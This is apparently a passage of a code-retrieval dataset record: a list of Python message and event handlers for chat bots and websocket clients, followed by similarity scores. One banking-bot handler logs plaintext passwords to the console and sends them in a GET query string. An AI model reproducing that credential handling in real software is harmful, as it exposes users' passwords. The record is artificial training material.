pass\r\n\r\n #Streaming\r\n elif request == \"GetStreamingStatus\":\r\n pass\r\n\r\n elif request == \"StartStopStreaming\":\r\n pass\r\n\r\n elif request == \"StartStreaming\":\r\n pass\r\n\r\n elif request == \"StopStreaming\":\r\n pass\r\n\r\n elif request == \"SetStreamSettings\":\r\n pass\r\n\r\n elif request == \"GetStreamSettings\":\r\n pass\r\n\r\n elif request == \"SaveStreamSettings\":\r\n pass\r\n\r\n elif request == \"SendCaptions\":\r\n pass\r\n\r\n #Studio Mode\r\n elif request == \"GetStudioModeStatus\":\r\n pass\r\n\r\n elif request == \"GetPreviewScene\":\r\n pass\r\n\r\n elif request == \"SetPreviewScene\":\r\n pass\r\n\r\n elif request == \"TransitionToProgram\":\r\n pass\r\n\r\n elif request == \"EnableStudioMode\":\r\n pass\r\n\r\n elif request == \"DisableStudioMode\":\r\n pass\r\n\r\n elif request == \"ToggleStudioMode\":\r\n pass\r\n\r\n #Transitions\r\n elif request == \"GetTransitionList\":\r\n pass\r\n\r\n elif request == \"GetCurrentTransition\":\r\n pass\r\n\r\n elif request == \"SetCurrentTransition\":\r\n pass\r\n\r\n elif request == \"SetTransitionDuration\":\r\n pass\r\n\r\n elif request == \"GetTransitionDuration\":\r\n pass\r\n\r\n elif request == \"GetTransitionPosition\":\r\n pass\r\n\r\n else:\r\n print(f\"Unhandled response of type {request} and data {self.data}.\")\r\n\r\n \r\n\r\n else:\r\n event: str = self.data[\"update-type\"]\r\n #Events as of 4.8.0\r\n\r\n #Scenes\r\n if event == \"SwitchScenes\":\r\n self.obs.setCurrentScene(self.data[\"scene-name\"])\r\n\r\n elif event == \"ScenesChanged\":\r\n #self.obs.purgeScenes()\r\n pass\r\n\r\n elif event == \"SceneCollectionChanged\":\r\n pass\r\n\r\n elif event == \"SceneCollectionListChanged\":\r\n pass\r\n\r\n #Transitions\r\n elif event == \"SwitchTransition\":\r\n pass\r\n\r\n elif event == \"TransitionListChanged\":\r\n pass\r\n\r\n elif event == \"TransitionDurationChanged\":\r\n pass\r\n\r\n elif event == \"TransitionBegin\":\r\n pass\r\n\r\n elif event == \"TransitionEnd\":\r\n pass\r\n\r\n elif event == \"TransitionVideoEnd\":\r\n pass\r\n\r\n #Profiles\r\n elif event == \"ProfileChanged\":\r\n pass\r\n\r\n elif event == \"ProfileListChanged\":\r\n pass\r\n\r\n #Streaming\r\n elif event == \"StreamStarting\":\r\n pass\r\n\r\n elif event == \"StreamStarted\":\r\n pass\r\n\r\n elif event == \"StreamStopping\":\r\n pass\r\n\r\n elif event == \"StreamStopped\":\r\n pass\r\n\r\n elif event == \"StreamStatus\":\r\n pass\r\n\r\n #Recording\r\n elif event == \"RecordingStarting\":\r\n pass\r\n\r\n elif event == \"RecordingStarted\":\r\n pass\r\n\r\n elif event == \"RecordingStopping\":\r\n pass\r\n\r\n elif event == \"RecordingStopped\":\r\n pass\r\n\r\n elif event == \"RecordingPaused\":\r\n pass\r\n\r\n elif event == \"RecordingResumed\":\r\n pass\r\n\r\n #Replay Buffer\r\n elif event == \"ReplayStarting\":\r\n pass\r\n\r\n elif event == \"ReplayStarted\":\r\n pass\r\n\r\n elif event == \"ReplayStopping\":\r\n pass\r\n\r\n elif event == \"ReplayStopped\":\r\n pass\r\n\r\n #Other\r\n elif event == \"Exiting\":\r\n pass\r\n\r\n #General\r\n elif event == \"Heartbeat\":\r\n pass\r\n\r\n elif event == \"BroadcastCustomMessage\":\r\n pass\r\n\r\n #Sources\r\n elif event == \"SourceCreated\":\r\n pass\r\n\r\n elif event == \"SourceDestroyed\":\r\n pass\r\n\r\n elif event == \"SourceVolumeChanged\":\r\n pass\r\n\r\n elif event == \"SourceMuteStateChanged\":\r\n pass\r\n\r\n elif event == \"SourceAudioDeactivated\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"SourceAudioActivated\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"SourceAudioSyncOffsetChanged\":\r\n pass\r\n\r\n elif event == \"SourceAudioMixersChanged\":\r\n pass\r\n\r\n elif event == \"SourceRenamed\":\r\n pass\r\n\r\n elif event == \"SourceFilterAdded\":\r\n pass\r\n\r\n elif event == \"SourceFilterRemoved\":\r\n pass\r\n\r\n elif event == \"SourceFilterVisibilityChanged\":\r\n source = self.obs.getSource(self.data[\"sourceName\"])\r\n if source != None:\r\n _filter = source.getFilter(self.data[\"filterName\"]) #type: ignore\r\n if _filter != None:\r\n _filter.setVisible(self.data[\"filterEnabled\"]) #type: ignore\r\n\r\n elif event == \"SourceFiltersReordered\":\r\n pass\r\n\r\n #Media\r\n elif event == \"MediaPlaying\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaPaused\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaRestarted\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaStopped\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaNext\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaPrevious\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaStarted\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaEnded\":\r\n #Unreleased\r\n pass\r\n\r\n #Scene Items\r\n elif event == \"SceneItemOrderChanged\":\r\n pass\r\n\r\n elif event == \"SceneItemAdded\":\r\n pass\r\n\r\n elif event == \"SceneItemRemoved\":\r\n pass\r\n\r\n elif event == \"SceneItemVisibilityChanged\":\r\n scene = self.obs.getScene(self.data[\"scene-name\"])\r\n if scene != None:\r\n source = scene.getSource(self.data[\"item-name\"]) #type: ignore\r\n if source != None:\r\n source.setVisible(self.data[\"item-visible\"]) #type: ignore\r\n \r\n\r\n elif event == \"SceneItemLockChanged\":\r\n pass\r\n\r\n elif event == \"SceneItemTransformChanged\":\r\n pass\r\n\r\n elif event == \"SceneItemSelected\":\r\n pass\r\n\r\n elif event == \"SceneItemDeselected\":\r\n pass\r\n\r\n #Studio Mode\r\n elif event == \"PreviewSceneChanged\":\r\n pass\r\n\r\n elif event == \"StudioModeSwitched\":\r\n pass\r\n\r\n #Unhandled Events\r\n else:\r\n print(\"Unhandled event with data: \" + str(self.data))", "def test_im_chat_messages(self):\n pass", "def callback_botmessage(self, message):\n pass", "def callback_botmessage(self, message):\n pass", "def callback_botmessage(self, message):\n pass", "def _on_message(self, message):\n print(\"RECEIVED on \" + self.session_name + \":\")\n message_json = json.loads(message)\n print(json.dumps(message_json, sort_keys=True, indent=2, separators=(',', ':')))\n\n for singleMsg in message_json:\n self._process_message(singleMsg)", "def test_messages(self):\n pass", "def messages(request):\n ctx = {}\n messages = get_messages(request)\n if messages:\n ctx['mesgs'] = messages\n return ctx", "def onMessageEnd(self):", "def Message(self, *args, **kwargs):\n pass", "def message():\n if request.method == 'POST':\n db.log_msg(request.form['text'], request.cookies.get('username'))\n return db.get_all_messages()", "def on_message(self, msg) -> None:\n\n decoded_msg = json.loads(msg)\n message_type = decoded_msg[\"type\"]\n\n if message_type == MSG_SUBCRIPTIONS:\n\n product_ids = decoded_msg[\"channels\"]\n logging.debug(\"Subscriptions: {}\".format(product_ids))\n\n elif message_type == MSG_SNAPSHOT:\n\n product_id = decoded_msg[\"product_id\"]\n self._snapshot(decoded_msg)\n\n # Old best bid and ask doesn't exist yet, this will always set a new bbo\n self.set_if_new_bbo(product_id)\n\n elif message_type == MSG_L2UPDATE:\n\n product_id = decoded_msg[\"product_id\"]\n self.update(decoded_msg)\n\n self.set_if_new_bbo(product_id)\n\n self.event_count += 1", "def show_messages(self):\n for msg in self.messages:\n print msg['text']", "def message_callback(self, message):\n pass", "async def chat_message(self, event):\n if self.user and not self.user.is_authenticated:\n return\n\n user_id = event['user_id']\n message = event['message']\n created_at = event['created_at']\n publisher_full_name = event['publisher_full_name']\n\n await self.send(text_data=json.dumps({\n 'user_id': user_id,\n 'created_at': created_at,\n 'message': \"{}\".format(message),\n 'publisher_full_name': publisher_full_name,\n }))", "def on_message(self, message):\n print \"Client %s received a message : %s\" % (self.id, message)", "async def on_message_activity(self, turn_context: TurnContext):\n reply = MessageFactory.list([])\n # Get the state properties from the turn context.\n welcome_user_state = await self.user_state_accessor.get(\n turn_context, WelcomeUserState\n )\n\n if not welcome_user_state.did_welcome_user:\n welcome_user_state.did_welcome_user = True\n\n text = turn_context.activity.text.lower()\n\n if text in (\"hello\", \"hi\",\"intro\",\"help\",\"menu\"):\n #await self.__send_intro_card(turn_context)\n reply.attachments.append(self.create_signin_card())\n await turn_context.send_activity(reply)\n\n \n else:\n # This example hardcodes specific utterances. You should use LUIS or QnA for more advance language\n # understanding.\n print(\"Printing action------\",turn_context.activity.text)\n print(\"Printing JSON------\",turn_context._activity.value)\n \n\n if turn_context._activity.value is not None:\n print(\"Printing type------\",turn_context._activity.value[\"type\"])\n print(\"Printing customer id------\",turn_context._activity.value[\"customerId\"])\n print(\"Printing password------\",turn_context._activity.value[\"password\"])\n\n customerId = turn_context._activity.value[\"customerId\"]\n password = turn_context._activity.value[\"password\"]\n terms = turn_context._activity.value[\"terms\"]\n isvalid = True\n if (customerId is None) or (str(customerId).strip()==\"\"):\n isvalid = False\n await turn_context.send_activity(\"Please enter valid Customer ID\")\n if (password is None) or (str(password).strip()==\"\"):\n isvalid = False\n await turn_context.send_activity(\"Please enter valid Password\")\n if (terms is None or terms in (\"false\")):\n isvalid = False\n await turn_context.send_activity(\"Please accept the terms and conditions.\")\n\n if (isvalid and turn_context._activity.value[\"type\"] in (\"Login\")):\n # defining a params dict for the parameters to be sent to the API\n PARAMS = {'userName': customerId, 'password': password}\n # sending get request and saving the response as response object\n r = requests.get(url=\"http://localhost:8080/login\", params=PARAMS)\n # extracting data in json format\n data = r.json()\n print(\"printing response \", data[\"loginStatus\"])\n if (data[\"loginStatus\"] is not None and data[\"loginStatus\"] in (\"success\")):\n await turn_context.send_activity(\"Login Succeded\")\n await turn_context.send_activity(\"An OTP is sent to your registered mobile number xxxxxxxx90.\")\n await turn_context.send_activity(\"Please enter the OTP.\")\n else:\n await turn_context.send_activity(\"Login Failed. Please try again\")\n # for key in turn_context._activity.value:\n # print(turn_context._activity.value[key])\n \n else:\n text = turn_context.activity.text.lower()\n \n if text in (\"369\"):\n await turn_context.send_activity(\"Thanks!!\")\n await self.__send_intro_card(turn_context)\n elif text in (\"sign-in\", \"login\"):\n await self.__login_otp_card_card(turn_context)\n elif text in (\"hello\", \"hi\",\"intro\",\"help\",\"menu\"):\n await self.__send_intro_card(turn_context)\n #await turn_context.send_activity(f\"You said { text }\")\n elif text in (\"account balance\"):\n await self.__send_accountbalance_card(turn_context)\n await turn_context.send_activity(\"Also, your deposit xxxxxxxxx9243 is closed pre-maturely as per your request and amount is credited to your third party account.\")\n elif text in (\"xxxxxxxxx4567\"):\n await self.__list_accountTransaction_card(turn_context)\n await self.__mobile_billDue_card(turn_context)\n elif text in (\"yes, pay my mobile bill\"):\n await self.__show_invoice_card(turn_context)\n await self.__show_selectAccountForBill_card(turn_context)\n elif text in(\"debit from xxxxxxxxx4567\"):\n await turn_context.send_activity(\"An OTP is sent to your registered mobile number xxxxxxxx90.\")\n await turn_context.send_activity(\"Please enter the OTP.\")\n elif text in (\"1234\"):\n await turn_context.send_activity(\"Transaction Successful !! Mobile bill paid for $100 from your account number xxxxxxxxx4567\")\n await turn_context.send_activity(\"As a loyal customer, we are happy to offer you one year free VISA card which comes with $25 movie voucher.\\n\\n Also your balance reward points 514 from card xxxxxxxxxxxx7653 will be added to the new card.\")\n await self.__show_congratulations_card(turn_context)\n elif text in (\"credit card\"):\n await turn_context.send_activity(\"Credit card xxxxxxxxxxxx7653 \\n\\n Current outstanding is $0.00 \\n\\n Card closed on 09/01/2020 \\n\\n Balance reward points are 514\")\n elif text in (\"service requests\"):\n await turn_context.send_activity(\"Currently there are no open service requests.\")\n elif text in (\"xxxxxxxxx4566\"):\n await turn_context.send_activity(\"Your current account xxxxxxxxx4566 is Active, but there are no transactions on it.\")\n elif text in (\"debit from xxxxxxxxx4566\"):\n await turn_context.send_activity(\"Insufficient account balance. Please choose another account\")\n await self.__show_selectAccountForBill_card(turn_context)\n #else:\n #await self.__send_intro_card(turn_context)", "def display_messages(self, layout):", "def onMessageFrame(self, payload):", "def get_messages(\n event: Dict[str, Any]\n ) -> List[Dict[str, Any]]:\n reply_message = event.get(\"reply_message\", {})\n return [reply_message] if reply_message else event.get(\"fwd_messages\", [])", "def message_handler(message):\n location = database.get_location(message.from_user.id)\n if not location:\n return {\"text\": \"Для поиска лекарств отправь своё местоположение\"}\n\n return get_drugs_message(find_drugs(message.text.encode('utf-8')))", "def handle_message() -> Response:\n commend = request.get_json()[\"message\"][\"text\"]\n chat_id = request.get_json()[\"message\"][\"chat\"][\"id\"]\n\n if commend == \"/start\":\n txt = \"Welcome to the shopping bot.\"+'\\n'+\"please enter category, or type popular to get the most popular searches \"\n elif str(commend).lower() in items:\n order[0] = str(commend)\n txt = \"choose color\"\n elif str(commend).lower() in colors:\n if order[0] == 0:\n txt = \"choose category\"\n order[1] = str(commend)\n txt = \"choose size\"\n elif str(commend).lower() in size:\n order[2] = str(commend)\n rec(chat_id, order)\n txt = get_url(order)\n elif str(commend).lower() == \"popular\":\n txt = get_popular(orders_dic)\n else:\n txt = \"try again\"\n # print(orders_dic)\n chat_id = request.get_json()[\"message\"][\"chat\"][\"id\"]\n print(chat_id)\n requests.get(f\"https://api.telegram.org/bot{TOKEN}/sendMessage?chat_id={chat_id}&text={txt}\")\n return Response(\"Success\")", "def handle_message(event):\n intention = parse_intention(event.message.text)\n if intention == config.QUERY_INTENTION:\n handle_query_weather_message(event)\n elif intention == config.SUBSCRIBE_INTENTION:\n handle_subscribe_message(event)\n else:\n handle_unknown_message(event)", "def listen():\n if request.method == 'GET':\n print request\n return verify_webhook(request)\n\n if request.method == 'POST':\n payload = request.json\n event = payload['entry'][0]['messaging']\n for x in event:\n if is_user_message(x):\n text = x['message']['text']\n sender_id = x['sender']['id']\n respond(sender_id, text)\n\n return \"ok\"", "def callback_message(self, message):\n pass", "def callback_message(self, message):\n pass", "def showMessage(self):", "def pubsub_consume(event, context):\n pubsub_message = base64.b64decode(event['data']).decode('utf-8')\n event_data = json.loads(pubsub_message)\n\n message = event_data['event']\n channel = message['channel']\n\n if message.get('bot_id') is None:\n text = message.get('text')\n\n if \"help\" in text:\n slack_text = \"\\n\\n *How to use the Tableau Slackbot* :robot_face: : \\n\" \\\n \"\\n 1. `list @tableau_server_app`: list views available to output to Slack\" \\\n \"\\n\\n 2. `gimmie @tableau_server_app What If Forecast`: generate the report\"\n response = client.chat_postMessage(\n channel=channel,\n text=slack_text)\n return response\n\n if \"list\" in text:\n slack_text = list('view')\n response = client.chat_postMessage(\n channel=channel,\n text=slack_text)\n return response\n\n if \"gimmie\" in text:\n\n filepath = time.strftime(\"%Y%m%d-%H%M%S\")\n view = event_data['event']['blocks'][0]['elements'][0]['elements'][2]['text']\n view_list = list('view')\n if view.strip() in view_list:\n generate_report(view, filepath)\n\n # Upload view from /tmp to Slack\n response = client.files_upload(\n channels=channel,\n file=\"/tmp/view_{0}.png\".format(filepath),\n title=\"View\"\n )\n\n # Delete the view generated locally\n if os.path.exists(\"/tmp/view_{0}.png\".format(filepath)):\n os.remove(\"/tmp/view_{0}.png\".format(filepath))\n\n else:\n slack_text = \":shrug: See the available views with: `list @tableau_server_app`\"\n response = client.chat_postMessage(\n channel=channel,\n text=slack_text)\n\n return response", "def getMessages(self):\n raise NotImplementedError(\"Child class must implement this\")", "async def on_chat_message(self, chat_message):\n pass", "def messages(self):\n return {}", "async def chat_message(self, event):\n message = event['message']\n await self.send_json({\n 'message': message\n })", "def handle(self, message):\n for callback in self.callbacks:\n callback(message['data'])", "def get_loaded_messages(self):\n self.chat.click()\n messages = []\n for message in self.chat.find_elements(By.XPATH, \"\"\"//*[@id=\"main\"]/div[3]/div/div/div[3]/*\"\"\"):\n messages.append(MessageElement(message))\n return messages", "def getmessage(self, update, context):\r\n\r\n redirect_uri = \"https://thawing-ridge-47246.herokuapp.com\"\r\n\r\n # настройка соединения\r\n flow = Flow.from_client_secrets_file(\r\n 'credentials.json',\r\n scopes=SCOPES,\r\n redirect_uri=redirect_uri)\r\n\r\n code = self.get_code()\r\n\r\n flow.fetch_token(code=code, code_verifier=\"111\") # устанавливаем соединение с гуглом\r\n\r\n session = flow.authorized_session() # создаем сессию\r\n response = session.get('https://www.googleapis.com/gmail/v1/users/me/messages').json() # формируем запрос и получаем ответ сервера\r\n\r\n messages = response[\"messages\"]\r\n\r\n # у каждого из сообщений достаем id\r\n for message in messages[0:10]:\r\n mid = message['id']\r\n\r\n # получаем сообщение по id\r\n message_message = session.get(f'https://www.googleapis.com/gmail/v1/users/me/messages/{mid}').json()\r\n\r\n # информация об отправителе, получателе и теме сообщения хранится в ключе 'payload' --> 'headers'\r\n headers = message_message['payload']['headers']\r\n\r\n from_who = None\r\n to_whom = None\r\n subject = None\r\n\r\n for item in headers:\r\n if item['name'] == 'From':\r\n from_who = item['value']\r\n elif item['name'] == 'To':\r\n to_whom = item['value']\r\n elif item['name'] == 'Subject':\r\n subject = item['value']\r\n\r\n # ищем текст сообщения\r\n # достаем из сообщения его части\r\n message_payload_parts = message_message['payload']['parts']\r\n zero_part = message_payload_parts[0]\r\n\r\n if zero_part['mimeType'] == 'text/plain':\r\n self.message_without_attachments(context, message_payload_parts, from_who, to_whom, subject)\r\n elif zero_part['mimeType'] == 'multipart/alternative':\r\n self.message_with_attachments(session, mid, context, zero_part, message_payload_parts, from_who,\r\n to_whom, subject)\r\n\r\n context.bot.send_message(chat_id=update.message.chat_id, text=f'Done.')", "def _report_message(message, level, request, extra_data, payload_data):\n if not _check_config():\n return\n\n filtered_message = events.on_message(message,\n request=request,\n extra_data=extra_data,\n payload_data=payload_data,\n level=level)\n\n if filtered_message is False:\n return\n\n data = _build_base_data(request, level=level)\n\n # message\n data['body'] = {\n 'message': {\n 'body': filtered_message\n }\n }\n\n if extra_data:\n extra_data = extra_data\n data['body']['message'].update(extra_data)\n\n request = _get_actual_request(request)\n _add_request_data(data, request)\n _add_person_data(data, request)\n _add_lambda_context_data(data)\n data['server'] = _build_server_data()\n\n if payload_data:\n data = dict_merge(data, payload_data, silence_errors=True)\n\n payload = _build_payload(data)\n send_payload(payload, payload.get('access_token'))\n\n return data['uuid']", "def on_event():\n\n event = request.get_json()\n \n token_status, token_text = validate_token()\n\n if token_status != 0:\n return json.jsonify({'text': token_text})\n\n if event['type'] == 'ADDED_TO_SPACE' and event['space']['type'] == 'ROOM':\n text = 'Thanks for adding me to \"%s\"! For help type @bot help' % event['space']['displayName']\n \n elif event['type'] == 'MESSAGE':\n\n room_name = event['space']['name'].split('/')[1]\n commands = ['list', 'add', 'remove', 'help']\n\n try:\n param = event['message']['text'].split()[1:][0]\n except:\n text = _help()\n return json.jsonify({'text': text})\n\n if param in commands:\n\n if param == 'list':\n text = _list(room_name)\n\n elif param == 'add':\n text = _add(event, room_name)\n\n elif param == 'remove':\n text = _remove(event, room_name)\n\n elif param == 'help':\n text = _help()\n return json.jsonify({'text': text})\n \n else:\n text = send_msg(event, room_name)\n\n else:\n return\n \n return json.jsonify({'text': text})", "def message(**payload):\n web_client = payload[\"web_client\"]\n\n # Getting information from the response\n data = payload[\"data\"]\n channel_id = data.get(\"channel\")\n text = data.get(\"text\")\n subtype = data.get(\"subtype\")\n ts = data['ts']\n user = data.get('username') if not data.get('user') else data.get('user')\n # Creating a Converstion object\n message = Message(ts, user, text)\n\n # Appending the converstion attributes to the logs\n conversation.append(message.toDict())\n\n if subtype == 'bot_message': return\n\n do_respond(web_client, channel_id, text)", "def listener(messages):\n for m in messages:\n chatid = m.chat.id\n print(str(chatid))\n if m.content_type == 'text':\n text = m.text\n tb.send_message(chatid, text)", "def handle_message(self, msg):\n self.messages.append({\n 'type': msg.category,\n 'module': msg.module,\n 'obj': msg.obj,\n 'line': msg.line,\n 'column': msg.column,\n 'path': msg.path,\n 'symbol': msg.symbol,\n 'message': msg.msg,\n 'message-id': msg.msg_id,\n })", "def on_message(self, event):\n self.response = event.message\n self.connection.container.yield_() # Wake up the wait() loop to handle the message.", "def events(self):", "def on_message(self, ws, message):\n message = json.loads(message)\n if message['type'] == 'error':\n self.on_error(None, message['message'])\n elif message['type'] == 'subscriptions':\n print(\"Subscribed to {}\".format(', '.join([ channel['name'] for channel in message['channels'] ])))\n else:\n if ((message['type']=='ticker' and message['product_id'] in self._ticker) or \n (message['type'] in [\"snapshot\", \"l2update\"] and message['product_id'] in self._level2) or \n (message['type'] in [\"received\",\"open\",\"done\",\"match\",\"change\",\"activate\"] )):\n self.messages.append(message)\n elif message['type']=='heartbeat':\n self.updated_time = time.time()", "def on_message(self, msg):\n self.log.info(msg)", "def handle_message(self, message):\n print \"[WARNING] No message handling implemented!\"", "def handle_text_messages(self, update, context):\n\n # Split user input into single words\n words = set(update.message.text.lower().split())\n logging.debug(f'Received message: {update.message.text}')\n\n # For debugging: Log users that received something from bot\n chat_user_client = update.message.from_user.username\n if chat_user_client == None:\n chat_user_client = update.message.chat_id\n\n\n # Possibility: received command from menu_trigger\n for Trigger in self.menu_trigger:\n for word in words:\n if word.startswith(Trigger):\n\n self.show_menu(update, context)\n logging.info(f'{chat_user_client} checked out the menu!')\n\n return\n\n\n # Possibility: received command from loan_stats_trigger\n for Trigger in self.loan_stats_trigger:\n for word in words:\n if word.startswith(Trigger):\n\n #self.send_textfile('under_construction.txt', update, context)\n self.show_loan_stats(update, context)\n self.send_signature(update, context)\n logging.info(f'{chat_user_client} got loan stats!')\n\n return\n\n # Possibility: received command from il_trigger\n for Trigger in self.il_trigger:\n for word in words:\n if word.startswith(Trigger):\n\n self.send_textfile('under_construction.txt', update, context)\n #self.show_il(update, context)\n #self.send_signature(update, context)\n logging.info(f'{chat_user_client} tried to get IL info!')\n\n return\n\n # Possibility: received command from assets_trigger\n for Trigger in self.assets_trigger:\n for word in words:\n if word.startswith(Trigger):\n\n self.send_textfile('under_construction.txt', update, context)\n #self.self.show_assets(update, context)\n #self.send_signature(update, context)\n logging.info(f'{chat_user_client} tried to get asset info!')\n\n return", "def _serialize_event_messages(event):\n if event.content_type == MessagingEvent.CONTENT_EMAIL:\n return _get_messages_for_email(event)\n\n if event.content_type in (MessagingEvent.CONTENT_SMS, MessagingEvent.CONTENT_SMS_CALLBACK):\n return _get_messages_for_sms(event)\n\n if event.content_type in (MessagingEvent.CONTENT_SMS_SURVEY, MessagingEvent.CONTENT_IVR_SURVEY):\n return _get_messages_for_survey(event)\n return []", "def on_text_message(self, update, context):\n chat_id = update.effective_chat.id\n log.info(\"Msg from:%s `%s`\", chat_id, update.effective_message.text)\n\n if context.user_data[\"state\"] == c.State.EXPECTING_AMOUNT:\n log.info(\"Vol:%s spent %s MDL on this request\", chat_id, update.effective_message.text)\n # TODO validate the message and make sure it is a number, discuss whether this is necessary at all\n # TODO send this to the server, we need to define an API for that\n request_id = context.user_data[\"current_request\"]\n\n # Write this amount to the persistent state, so we can rely on it later\n context.bot_data[request_id][\"amount\"] = update.effective_message.text\n\n # Then we have to ask them to send a receipt.\n self.send_message_ex(update.message.chat_id, c.MSG_FEEDBACK_RECEIPT)\n context.user_data[\"state\"] = c.State.EXPECTING_RECEIPT\n return\n\n if context.user_data[\"state\"] == c.State.EXPECTING_FURTHER_COMMENTS:\n log.info(\"Vol:%s has further comments: %s\", chat_id, update.effective_message.text)\n request_id = context.user_data[\"current_request\"]\n context.bot_data[request_id][\"further_comments\"] = update.effective_message.text\n self.finalize_request(update, context, request_id)\n return\n\n if context.user_data[\"state\"] == c.State.EXPECTING_PROFILE_DETAILS:\n self.build_profile(update, context, raw_text=update.effective_message.text)\n return\n\n # if we got this far it means it is some sort of an arbitrary message that we weren't yet expecting\n log.warning(\"unexpected message ..........\")", "async def chat_message(self, event):\n await self.send_json(\n return_value(\n ACTION_MESSAGE,\n event['label'],\n event['username'],\n MSG_MESSAGE,\n event['message']\n )\n )", "def MultiMessage(self, *args, **kwargs):\n pass", "async def messages(self, ctx):\n\n\t\tawait self.message_leaderboard(ctx, \"messages\")", "def get_message(self, i):\n pass", "def on_bot_message():\n handle_bot_message(request.get_json())\n return \"ok\"", "def messaging_events(payload):\n data = json.loads(payload)\n message = data[\"entry\"][0][\"messaging\"]\n for event in message:\n if \"message\" in event and \"text\" in event[\"message\"]:\n # if message in event and text in message set id and text\n sender_id = event[\"sender\"][\"id\"]\n text = event[\"message\"][\"text\"]\n quick_reply_payload = None\n\n if \"quick_reply\" in event[\"message\"]:\n # if quick_reply i message set payload\n quick_reply_payload = event[\"message\"][\"quick_reply\"][\"payload\"]\n yield sender_id, text, quick_reply_payload\n else:\n yield event[\"sender\"][\"id\"], \"I can't echo this\", None", "def receive(self, message):", "def handle_send_messages():\n items = {k: v for k, v in subscribers.items() if v}\n for key in items:\n subscriber_obj = items[key]\n sim_id = get_sim_id(subscriber_obj)\n if sim_id and type(sim_id) is int:\n frame_messenger(subscriber_obj)\n elif sim_id and sim_id == \"live\":\n live_messenger(subscriber_obj)", "def send(self, event, message):\n pass", "def test_sendimmessages(self):\n pass", "def messages(self):\n return MessageNotification.messages", "def process(self, message: Message, **kwargs: Any) -> None:", "def handle_pubnub_message(self, message: dict) -> None:\n super().handle_pubnub_message(message)\n\n event = None\n\n if message.get(Attribute.CAMERA_THUMBNAIL_DATE):\n event = THUMBNAIL_READY\n elif message.get(Attribute.DING_DONG):\n event = DOORBELL_DING\n elif message.keys() == set([Attribute.ID, Attribute.TYPE]):\n event = VIDEO_READY\n elif message.get(Attribute.VISITOR_DETECTED) or message.keys() in [\n set([Attribute.ID, Attribute.ACTUAL_TYPE, Attribute.STATE]),\n set([Attribute.ID, Attribute.DETER_ON_DUTY, Attribute.TYPE]),\n ]:\n event = MOTION_DETECTED\n\n if event is not None:\n self.emit(event, {\"message\": message})\n\n _LOGGER.debug(\"Message received by %s: %s\", self.name, message)", "def on_message(self, data):\n req = json.loads(data)\n self.serve(req)", "def on_message(self, data):\n req = json.loads(data)\n self.serve(req)", "def get_message_handlers(self):\n\t\treturn self.message_handlers", "async def chat_message(self, event):\n\n print(\"PublicChatConsumer\", \"chat_message from user\", event[\"user_id\"])\n await self.send_json({\n \"msg_type\": MSG_TYPE_MESSAGE,\n \"profile_image\": event[\"profile_image\"],\n \"username\": event[\"username\"],\n \"user_id\": event[\"user_id\"],\n \"message\": event[\"message\"],\n \"natural_timestamp\": humanize_or_normal(timezone.now())\n })", "def _r_handle_message_contents(self, msg, protocol):\n if isinstance(msg, ResponseMessage):\n d = self._waiting_messages.pop(msg.response_to, None)\n if d is not None:\n d.callback(msg)\n elif isinstance(msg, ServerMotdMessage):\n print(\"Connected: %s\" % msg.motd)\n self._r_successful_connection()\n elif isinstance(msg, EventMessage):\n callback = self._event_callbacks.get((msg.service_name, msg.event_name))\n if callback is not None:\n threads.deferToThread(callback, *msg.pargs, **msg.kwargs)", "def get_messages(self):\n return self.messages_received", "def get_messages(self):\n return self.messages_received", "def get_messages(self):\n return self.messages_received" ]
[ "0.64154905", "0.63751894", "0.635842", "0.62978166", "0.6275776", "0.62662673", "0.6228096", "0.6210156", "0.6176662", "0.6156185", "0.6149644", "0.61168385", "0.60755175", "0.6055626", "0.6054083", "0.6031606", "0.6029565", "0.6019241", "0.5985364", "0.5980711", "0.59471154", "0.5932648", "0.59226626", "0.59200895", "0.5905758", "0.59049445", "0.5897722", "0.5895032", "0.5876532", "0.5873094", "0.58730024", "0.5862964", "0.58533174", "0.58512735", "0.58512735", "0.58512735", "0.58428603", "0.5821677", "0.5819039", "0.58146536", "0.5813998", "0.5801771", "0.57914555", "0.5762818", "0.5762054", "0.57574314", "0.57387865", "0.57377726", "0.57245606", "0.5721118", "0.5703146", "0.5701226", "0.5701181", "0.56955093", "0.56943184", "0.5690268", "0.5690268", "0.5682051", "0.56818527", "0.56635946", "0.56533086", "0.5652328", "0.5639714", "0.5636847", "0.56318957", "0.5628387", "0.56239474", "0.56183034", "0.5617216", "0.56115556", "0.56046045", "0.55961007", "0.5593991", "0.5592689", "0.55923015", "0.559133", "0.55904317", "0.5580793", "0.55753183", "0.5575297", "0.5572395", "0.5571826", "0.5571222", "0.5570502", "0.55678976", "0.5564545", "0.5563295", "0.5555898", "0.5550811", "0.5542564", "0.5538594", "0.55361897", "0.5534987", "0.5534987", "0.55346024", "0.5520096", "0.5519228", "0.55154204", "0.55154204", "0.55154204" ]
0.69531924
0
This method is responsible for responding to events hit on synchronous api
def respond_to_events(self): event_response = MessageEventHandler(self.state, self.meta_data, self.message_data).handle_events(events=self.events) if event_response == []: return {} return event_response[0]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "async def run(self):\n current_status = \"Init\"\n while self.expected_status != current_status:\n await asyncio.sleep(1)\n async with aiohttp.ClientSession() as session:\n async with session.get(self.url) as response:\n api_call_result = await response.json()\n current_status = api_call_result[\"status\"]\n \n # Send our single event and then we're done\n yield TriggerEvent(api_call_result)", "def event_handler(self, response):\n pass", "async def _response_handler(self):", "async def _execute(self):", "async def request(self) -> Any:\n raise NotImplementedError()", "async def _handle_request(self, request: web.Request) -> web.Response:\n event = await request.json()\n # This handler will be called on the server thread. Call the external\n # handler on the app thread.\n self._main_loop.call_soon_threadsafe(self.handle_event, event)\n return web.Response(text=\"OK\")", "async def execute(self):", "async def perform_action(self) -> None:", "def async_update(self):", "async def run(self) -> None:", "async def run(self) -> None:", "async def do_run(self, event_bus: EndpointAPI) -> None:\n ...", "def on_success(self) -> None:", "def get_api_event(self):\n pass", "def __update_data(self):\r\n # loop = asyncio.get_event_loop()\r\n api_base_info_req = 